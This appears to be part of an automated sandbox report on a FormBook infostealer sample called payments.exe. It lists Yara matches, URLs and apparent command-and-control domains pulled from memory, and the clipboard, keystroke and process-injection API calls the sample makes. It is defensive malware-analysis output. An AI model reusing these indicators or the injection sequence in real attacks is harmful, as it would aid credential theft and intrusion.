                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: XhwUfLdILQipZF.exe, 00000006.00000002.3803049222.00000000056B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3kw40881107247y.click
                Source: XhwUfLdILQipZF.exe, 00000006.00000002.3803049222.00000000056B4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3kw40881107247y.click/6wln/
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Matteicapital.online
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.000000000611A000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.000000000471A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvd
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online
                Source: pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: pcaui.exe, 00000004.00000002.3794437127.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: pcaui.exe, 00000004.00000003.1651099850.0000000007619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: pcaui.exe, 00000004.00000002.3794437127.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: pcaui.exe, 00000004.00000002.3802641063.00000000057AE000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: pcaui.exe, 00000004.00000002.3802641063.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000038F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CE6B0C
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CE6D07
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CE6B0C
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CD2B37
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CFF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CFF7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3800852385.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455387044.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3793634224.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3800786167.0000000004370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3803049222.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1456263515.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1455910755.0000000003620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3800781510.0000000003710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\payments.exeCode function: This is a third-party compiled AutoIt script.0_2_00C93D19
                Source: payments.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: payments.exe, 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c3fa260d-7
                Source: payments.exe, 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e30df9b6-e
                Source: payments.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5e84a54c-3
                Source: payments.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5bedbacf-4
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: payments.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C893 NtClose,2_2_0042C893
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04634650 NtSuspendThread,LdrInitializeThunk,4_2_04634650
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04634340 NtSetContextThread,LdrInitializeThunk,4_2_04634340
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632C60 NtCreateKey,LdrInitializeThunk,4_2_04632C60
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04632C70
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04632CA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04632D30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04632D10
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04632DF0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632DD0 NtDelayExecution,LdrInitializeThunk,4_2_04632DD0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04632EE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04632E80
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632F30 NtCreateSection,LdrInitializeThunk,4_2_04632F30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632FE0 NtCreateFile,LdrInitializeThunk,4_2_04632FE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632FB0 NtResumeThread,LdrInitializeThunk,4_2_04632FB0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632AF0 NtWriteFile,LdrInitializeThunk,4_2_04632AF0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632AD0 NtReadFile,LdrInitializeThunk,4_2_04632AD0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632B60 NtClose,LdrInitializeThunk,4_2_04632B60
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04632BE0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04632BF0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04632BA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046335C0 NtCreateMutant,LdrInitializeThunk,4_2_046335C0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_046339B0 NtGetContextThread,LdrInitializeThunk,4_2_046339B0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632C00 NtQueryInformationProcess,4_2_04632C00
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632CF0 NtOpenProcess,4_2_04632CF0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632CC0 NtQueryVirtualMemory,4_2_04632CC0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632D00 NtSetInformationFile,4_2_04632D00
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632DB0 NtEnumerateKey,4_2_04632DB0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632E30 NtWriteVirtualMemory,4_2_04632E30
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632EA0 NtAdjustPrivilegesToken,4_2_04632EA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632F60 NtCreateProcessEx,4_2_04632F60
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632FA0 NtQuerySection,4_2_04632FA0
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_04632F90 NtProtectVirtualMemory,4_2_04632F90
